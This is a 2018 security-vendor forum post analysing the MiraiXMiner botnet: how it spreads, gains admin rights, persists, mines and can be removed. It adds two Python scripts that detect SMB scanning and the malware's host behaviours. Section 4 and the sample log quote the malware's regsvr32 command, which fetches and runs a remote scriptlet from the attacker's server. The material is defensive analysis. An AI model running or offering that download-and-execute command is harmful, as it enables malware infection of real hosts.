Alert: MiraiXMiner IoT Botnet Featuring Multiple Virus Families!
Sangfor Elsa (Lv2), posted 05 Dec 2018 17:06

Last edited by Sangfor Elsa 05 Dec 2018 17:10.

The Sangfor Security team has recently discovered a new IoT botnet that combines features from several different virus families, including Mirai, Mykings and the Dark Cloud Trojan. Sangfor has named this new botnet MiraiXMiner. By tracking and monitoring its progress, the team has found that it spreads through EternalBlue, vulnerabilities in CCTV IoT-capable devices and MS SQL, and RDP and Telnet brute-force attacks.

1. Attack Procedures
1. The virus vector msinfo.exe achieves persistence through service registration and malicious code injection.
2. A C&C command instructs the host to download an arbitrary attack module; in this case MiraiXMiner downloads csrs.exe.
3. A privileged admin user account is added.
4. Three submodules are downloaded: backdoor, DNS hijacking and cleanup (the backdoor module up.rar is the well-known Dark Cloud BootKit).
5. u.exe hijacks DNS by altering the DNS configuration files.
6. The cleanup module upsnew2.exe performs several roles, including removing other viruses, adding auto-boot items and stopping the Windows Update service, so that the host can be controlled in the long term while it keeps downloading modules and mining.
7. A scanner and the Mirai attack database are used to launch a large-scale attack on the internal network.
8. The function vector msinfo.exe connects to the cloud to auto-update the virus and fetch the latest attack module.

1.png


2. Propagation Module

2.png

Scanning on port 445, as shown below:

3.png

Scanning is also performed with a built-in MASSCAN program, as shown below:

4.png

and with a built-in Nmap program, as shown below:

5.png

Attacks are launched against any vulnerable targets discovered.
The following shows an EternalBlue attack (CrackerMS17010) in progress:

6.png

CrackerCCTV attacks vulnerable CCTV IoT-capable devices, as shown below:

7.png

CrackerMSSQL attacks MSSQL servers, as shown below:

8.png

Database commands are executed, as shown below:

9.png

Malicious code is written into database storage, as shown below:

10.png

CrackerRDP conducts an attack against RDP, as shown below:

11.png

CrackerTelnet conducts an attack against Telnet, as shown below:

12.png
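The propagation module above fans out across the internal network on TCP/445 before launching EternalBlue, so the most reliable early warning for a defender is the scan itself: one internal source suddenly reaching many distinct hosts on port 445 in a short time. The following is an added example, not part of Sangfor's analysis; the flow records are constructed, and the threshold and window sizes are assumptions to be tuned per environment.

```python
"""Flag internal hosts that fan out on TCP/445 from simple flow records.

Added example: the flow lines below are constructed ("timestamp src dst dport proto"),
and the threshold/window defaults are assumptions, not values from the write-up.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.0.0.15 sweeps seven neighbours on 445 within seconds
# (scanner behaviour); 10.0.0.30 talks repeatedly to one file server (normal);
# 10.0.0.31 touches two hosts, below any sensible threshold.
SAMPLE_FLOWS = """\
2018-12-04T10:00:01 10.0.0.15 10.0.0.20 445 tcp
2018-12-04T10:00:01 10.0.0.15 10.0.0.21 445 tcp
2018-12-04T10:00:02 10.0.0.15 10.0.0.22 445 tcp
2018-12-04T10:00:02 10.0.0.15 10.0.0.23 445 tcp
2018-12-04T10:00:03 10.0.0.15 10.0.0.24 445 tcp
2018-12-04T10:00:03 10.0.0.15 10.0.0.25 445 tcp
2018-12-04T10:00:04 10.0.0.15 10.0.0.26 445 tcp
2018-12-04T10:00:05 10.0.0.30 10.0.0.5 445 tcp
2018-12-04T10:00:09 10.0.0.30 10.0.0.5 445 tcp
2018-12-04T10:00:15 10.0.0.30 10.0.0.5 445 tcp
2018-12-04T10:00:20 10.0.0.31 10.0.0.5 445 tcp
2018-12-04T10:00:21 10.0.0.31 10.0.0.6 445 tcp
2018-12-04T10:00:22 10.0.0.31 10.0.0.7 80 tcp
"""


def parse_flows(text):
    """Parse 'timestamp src dst dport proto' lines into tuples; skips blanks/comments."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport, proto = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(dport), proto))
    return records


def find_smb_scanners(records, threshold=5, window=timedelta(seconds=60), port=445):
    """Return {src: max distinct destinations} for sources that reach at least
    `threshold` distinct hosts on `port` within any sliding `window`."""
    per_src = defaultdict(list)
    for ts, src, dst, dport, proto in sorted(records):
        if dport == port and proto == "tcp":
            per_src[src].append((ts, dst))

    scanners = {}
    for src, hits in per_src.items():
        start = 0
        for end in range(len(hits)):
            # Slide the window start forward until it fits within `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            distinct = {dst for _, dst in hits[start:end + 1]}
            if len(distinct) >= threshold:
                scanners[src] = max(scanners.get(src, 0), len(distinct))
    return scanners


if __name__ == "__main__":
    for src, count in find_smb_scanners(parse_flows(SAMPLE_FLOWS)).items():
        print(f"possible SMB scanner: {src} reached {count} hosts on tcp/445")
```

The sliding window matters: a backup server legitimately opens many 445 sessions over a day, but not to seven new peers inside a few seconds. Hosts flagged here are candidates for the isolation step in the Solution section, and the same logic applies to the Telnet (23), RDP (3389) and MSSQL (1433) sweeps described above by changing the `port` argument.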

3. Creating Admin Account
The attacker downloads the corresponding configuration file from a remote server and decrypts it, as shown below:

13.png

The downloaded config file decrypts to an XML file that downloads and runs the malicious program, as shown below:

14.png

The downloaded executable CSRS is built from a Python script. It is an exploit for MS17-010 that is used to create accounts, as shown below:

15.png

An admin account is created on the host, as shown below:

16.png

An attack is launched using the MS17-010 vulnerability, as shown below:

17.png

Attack parameters are as shown below:

18.png

4. Cryptomining and Dark Cloud Trojan

The malicious program is downloaded by running regsvr32 /s /u /n /i:http://up.ms1128.site:8888\\s1.txt scrobj.dll, which makes regsvr32 fetch and execute a remote scriptlet through scrobj.dll, as shown below:

19.png

Decrypt the above XML script, as shown below:

20.png

Upsnew2 drops the Dark Cloud Trojan item.dat and the c3.bat script. The c3.bat script has the following functions:

Removes other viruses:


21.jpg

Enables MSSQLSERVER:

22.jpg

Alters registry and scheduled task settings so that the virus launches automatically at host startup:

23.jpg

24.jpg

Disables auto update:

25.jpg

Loads the Dark Cloud Trojan:

26.jpg

Alters the firewall configuration to block ports 135, 137, 138, 139 and 445, so that other viruses cannot infect the host through the same channels.

27.jpg
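The host-side steps described in sections 3 and 4 (the regsvr32 download via scrobj.dll, the new admin account, the Run-key and scheduled-task persistence, the stopped Windows Update service and the firewall change) all leave command lines in process-creation telemetry. The triage script below is an added example and not part of Sangfor's analysis: the log lines are constructed (only the URL is the one quoted above), the log format is an assumed simple key=value layout, and the regexes are an assumption about how these steps usually appear on a command line.

```python
"""Flag Windows process-creation records that match the host-side behaviours
described for MiraiXMiner / upsnew2 / c3.bat.

Added example. Log lines are constructed in an assumed key=value format; the
rule regexes are assumptions about typical command-line shapes, not signatures
taken from the write-up.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) host=(?P<host>\S+) user=(?P<user>\S+) "
    r"image=(?P<image>\S+) cmd=(?P<cmd>.*)$")

# (rule name, regex applied to the full command line), case-insensitive.
RULES = [
    ("regsvr32 loading a remote scriptlet via scrobj.dll",
     re.compile(r"\bregsvr32(\.exe)?\b.*\s/i:https?://.*\bscrobj\.dll", re.I)),
    ("local user account created",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("account added to local Administrators group",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("scheduled task created",
     re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I)),
    ("Run key modified",
     re.compile(r"\breg(\.exe)?\s+add\s+.*\\CurrentVersion\\Run\b", re.I)),
    ("Windows Update service stopped or disabled",
     re.compile(r"\bnet1?\s+stop\s+wuauserv\b|\bsc(\.exe)?\s+config\s+wuauserv\s+start=\s*disabled\b", re.I)),
    ("firewall rule touching SMB/NetBIOS ports",
     re.compile(r"\bnetsh(\.exe)?\b.*\bfirewall\b.*\b(135|137|138|139|445)\b", re.I)),
]

# Constructed sample: WS01 shows the full chain; WS02 shows benign look-alikes
# (regsvr32 registering a local DLL, a normal "net use").
SAMPLE_LOG = r"""
2018-12-04 10:01:02 host=WS01 user=SYSTEM image=C:\Windows\System32\regsvr32.exe cmd=regsvr32 /s /u /n /i:http://up.ms1128.site:8888\\s1.txt scrobj.dll
2018-12-04 10:01:10 host=WS01 user=SYSTEM image=C:\Windows\System32\net1.exe cmd=net1 user svc_backup Passw0rd! /add
2018-12-04 10:01:11 host=WS01 user=SYSTEM image=C:\Windows\System32\net.exe cmd=net localgroup administrators svc_backup /add
2018-12-04 10:01:20 host=WS01 user=SYSTEM image=C:\Windows\System32\schtasks.exe cmd=schtasks /create /tn updater /tr C:\ProgramData\msinfo.exe /sc onstart /ru SYSTEM
2018-12-04 10:01:21 host=WS01 user=SYSTEM image=C:\Windows\System32\reg.exe cmd=reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v msinfo /d C:\ProgramData\msinfo.exe /f
2018-12-04 10:01:30 host=WS01 user=SYSTEM image=C:\Windows\System32\sc.exe cmd=sc config wuauserv start= disabled
2018-12-04 10:01:40 host=WS01 user=SYSTEM image=C:\Windows\System32\netsh.exe cmd=netsh advfirewall firewall add rule name=blocksmb dir=in action=block protocol=TCP localport=445
2018-12-04 10:02:00 host=WS02 user=alice image=C:\Windows\System32\regsvr32.exe cmd=regsvr32 /s C:\Program Files\Vendor\component.dll
2018-12-04 10:02:05 host=WS02 user=alice image=C:\Windows\System32\net.exe cmd=net use Z: \\fileserver\share
"""


def parse_line(line):
    """Parse one record into a dict, or None if the line does not fit the format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def triage(log_text):
    """Return [(host, rule_name, cmd)] for every rule each record matches."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for name, rx in RULES:
            if rx.search(rec["cmd"]):
                findings.append((rec["host"], name, rec["cmd"]))
    return findings


def summarize(findings):
    """Host -> sorted list of distinct rule names it triggered."""
    by_host = defaultdict(set)
    for host, name, _ in findings:
        by_host[host].add(name)
    return {host: sorted(names) for host, names in by_host.items()}


if __name__ == "__main__":
    for host, names in summarize(triage(SAMPLE_LOG)).items():
        print(f"{host}: {len(names)} behaviours")
        for name in names:
            print(f"  - {name}")
```

No single rule is conclusive on its own (administrators create accounts and scheduled tasks too), which is why the summary groups hits per host: a machine that triggers several of these within a couple of minutes, as WS01 does here, matches the chain described above and should be isolated first.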

5. Solution

1. Isolate the infected hosts: end all connections and disable the network adapter.

2. Cut off the spread channel by disabling network sharing on SMB port 445 and ending all suspicious outgoing connections. Sangfor NGAF customers should update the signature database to version 20181204 or above and enable IPS and APT detection.

3. Remove the virus with the Sangfor EDR tool, which can be downloaded here: http://go.sangfor.com/edr-tool-20181122

4. Fix the vulnerability by installing Microsoft's MS17-010 patch, which closes the EternalBlue vulnerability.
